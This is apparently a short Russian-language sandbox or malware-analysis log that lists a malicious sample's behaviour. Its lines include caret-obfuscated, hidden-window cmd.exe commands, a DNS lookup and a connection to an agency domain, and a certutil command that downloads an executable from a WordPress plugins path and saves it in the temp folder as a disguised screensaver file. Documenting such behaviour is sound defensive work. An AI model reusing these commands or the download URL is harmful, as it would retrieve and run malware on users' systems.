Техническая информация
- '<SYSTEM32>\cmd.exe' /c ^S^t^A^r^t^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^b^ ^ ^ ^ ^ ^ ^ ^ ^/^m^i^N^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^^^C^E^R^^^t^...
- 'lg.##7.agency':443
- DNS ASK lg.##7.agency
- '<SYSTEM32>\cmd.exe' /c ^S^t^A^r^t^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^b^ ^ ^ ^ ^ ^ ^ ^ ^/^m^i^N^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^^^C^E^R^^^t^...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" StArt /b /miN ^CER^t^uTIl /urlCAChE /SPliT /F ...
- '<SYSTEM32>\cmd.exe' /sTaRT /b /min pinG.ExE
- '<SYSTEM32>\certutil.exe' /urlCAChE /SPliT /F https://lg.667.agency/wp-content/plugins/KKc.exe %TEMP%\TaskMGRTaskMtGRv.scr